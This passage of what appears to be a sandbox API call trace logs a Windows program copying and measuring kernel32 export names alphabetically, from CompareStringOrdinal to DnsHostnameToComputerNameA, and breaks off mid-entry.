[0076.793] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0076.793] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0076.793] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0076.793] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0076.793] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0076.793] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0076.793] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0076.793] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0076.793] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0076.793] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0076.793] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0076.793] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0076.793] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0076.793] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0076.793] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0076.793] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0076.793] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0076.793] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0076.793] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0076.793] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0076.793] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0076.793] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0076.793] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0076.793] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0076.793] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0076.793] lstrlenA (lpString="COPYCONTEXT") returned 11 [0076.793] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0076.793] lstrlenA (lpString="COPYFILEA") returned 9 [0076.793] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0076.793] lstrlenA (lpString="COPYFILEEXA") returned 11 [0076.793] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0076.793] lstrlenA (lpString="COPYFILEEXW") returned 11 [0076.794] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0076.794] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0076.794] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0076.794] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0076.794] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0076.794] lstrlenA (lpString="COPYFILEW") returned 9 [0076.794] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0076.794] lstrlenA (lpString="COPYLZFILE") returned 10 [0076.794] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0076.794] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0076.794] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0076.794] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0076.794] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0076.794] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0076.794] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0076.794] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0076.794] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0076.794] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0076.794] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0076.794] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0076.794] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0076.794] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0076.794] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0076.794] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0076.794] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0076.794] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0076.794] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0076.794] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0076.794] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0076.794] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0076.794] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0076.794] lstrlenA (lpString="CREATEEVENTA") returned 12 [0076.794] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0076.794] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0076.794] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0076.794] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0076.795] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0076.795] lstrlenA (lpString="CREATEEVENTW") returned 12 [0076.795] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0076.795] lstrlenA (lpString="CREATEFIBER") returned 11 [0076.795] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0076.795] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0076.795] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0076.795] lstrlenA (lpString="CREATEFILEA") returned 11 [0076.795] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0076.795] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0076.795] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0076.795] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0076.795] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0076.795] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0076.795] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0076.796] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0076.796] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0076.796] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0076.796] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0076.796] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0076.796] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0076.796] lstrlenA (lpString="CREATEFILEW") returned 11 [0076.796] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0076.796] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0076.796] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0076.796] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0076.796] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0076.796] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0076.796] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0076.796] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0076.796] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0076.796] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0076.796] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0076.796] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0076.796] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0076.796] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0076.796] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0076.796] lstrlenA (lpString="CREATEJOBSET") returned 12 [0076.796] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0076.796] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0076.796] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0076.796] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0076.796] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0076.796] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0076.796] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0076.796] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0076.797] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0076.797] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0076.797] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0076.797] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0076.797] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0076.797] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0076.797] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0076.797] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0076.797] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0076.797] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0076.797] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0076.797] lstrlenA (lpString="CREATEPIPE") returned 10 [0076.797] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0076.797] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0076.797] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0076.797] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0076.797] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0076.797] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0076.797] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0076.797] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0076.797] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0076.797] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0076.797] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0076.797] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0076.797] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0076.797] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0076.797] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0076.797] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0076.797] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0076.797] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0076.797] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0076.797] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0076.797] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0076.798] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0076.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0076.798] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0076.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0076.798] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0076.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0076.798] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0076.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0076.798] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0076.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0076.798] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0076.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0076.798] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0076.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0076.798] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0076.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0076.798] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0076.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0076.798] lstrlenA (lpString="CREATETHREAD") returned 12 [0076.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0076.798] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0076.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0076.798] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0076.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0076.798] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0076.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0076.798] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0076.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0076.798] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0076.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0076.798] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0076.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0076.798] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0076.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0076.798] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0076.798] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0076.799] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0076.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0076.799] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0076.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0076.799] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0076.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0076.799] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0076.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0076.799] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0076.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0076.799] lstrlenA (lpString="CTRLROUTINE") returned 11 [0076.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0076.799] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0076.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0076.799] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0076.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0076.799] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0076.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0076.799] lstrlenA (lpString="DEBUGBREAK") returned 10 [0076.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0076.799] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0076.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0076.799] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0076.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0076.799] lstrlenA (lpString="DECODEPOINTER") returned 13 [0076.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0076.799] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0076.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0076.799] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0076.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0076.799] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0076.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0076.799] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0076.799] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0076.799] lstrlenA (lpString="DELETEATOM") returned 10 [0076.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0076.800] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0076.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0076.800] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0076.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0076.800] lstrlenA (lpString="DELETEFIBER") returned 11 [0076.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0076.800] lstrlenA (lpString="DELETEFILEA") returned 11 [0076.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0076.800] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0076.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0076.800] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0076.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0076.800] lstrlenA (lpString="DELETEFILEW") returned 11 [0076.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0076.800] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0076.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0076.800] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0076.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0076.800] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0076.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0076.800] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0076.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0076.800] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0076.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0076.800] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0076.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0076.800] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0076.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0076.800] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0076.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0076.800] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0076.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0076.800] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0076.800] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0076.801] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0076.801] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: 